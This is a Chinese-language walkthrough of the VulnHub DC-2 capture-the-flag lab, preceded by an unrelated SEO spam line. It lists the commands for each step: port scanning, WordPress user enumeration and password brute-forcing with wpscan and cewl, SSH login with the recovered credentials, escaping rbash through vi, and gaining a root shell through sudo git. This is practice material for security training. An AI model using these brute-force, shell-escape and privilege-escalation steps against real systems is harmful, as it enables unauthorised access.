深圳信科網(wǎng)站建設鄭州seo排名優(yōu)化
文章目錄
- 一、環(huán)境搭建
- 二、滲透流程
- 三、思路總結(jié)
一、環(huán)境搭建
DC-2下載地址:https://download.vulnhub.com/dc/DC-2.zip
kali:192.168.144.148
DC-2:192.168.144.150
添加hosts文件:192.168.144.150 DC-2
二、滲透流程
nmap -A -T5 -sV -sT -p- 192.168.144.150
開放端口:80(web)、 7744(ssh)
訪問:192.168.144.150
獲取到flag1
flag1提示需要使用cewl進行暴力破解
進行目錄掃描,獲取到后臺登錄地址:http://dc-2/wp-admin
使用wpscan
對wordpress用戶進行枚舉:wpscan --url http://dc-2 -e u
獲取到三個用戶:admin、jerry、tom
利用cewl工具生成密碼字典:cewl http://dc-2 -w passwd.txt
生成用戶字典:vim user1.txt
使用wpscan進行爆破:wpscan --url http://dc-2 -U user1.txt -P passwd.txt
獲取到了
jerry:adipiscing
、tom: parturient
,登錄后臺
獲取到flag2
flag2提示,如果此路不通,嘗試另一種方法,嘗試7744端口ssh連接
tom登錄成功
發(fā)現(xiàn)
flag3
rbash
限制,cat無法執(zhí)行,vim無法執(zhí)行,vi可以執(zhí)行
flag3提示可以嘗試切換一下用戶
方法一:使用vi突破rbash
vi
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry
成功切換到jerry
成功訪問到
flag4
查看是否有可以提權(quán)的命令:
find / -perm -u=s -type f 2>/dev/null
sudo -l
:發(fā)現(xiàn)git可以利用,flag4也提示了可以使用git
sudo git help config
:進入文本模式
!/bin/bash
:獲取shell
獲取最后的
final-flag.txt
三、思路總結(jié)
1、nmap端口掃描,添加hosts文件,訪問web頁面;
2、dirb目錄掃描獲取后臺登錄地址;
3、cewl暴力破解獲取后臺登錄賬戶;
4、ssh遠程連接;
5、vi突破rbash切換用戶;
6、git提權(quán);
參考鏈接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2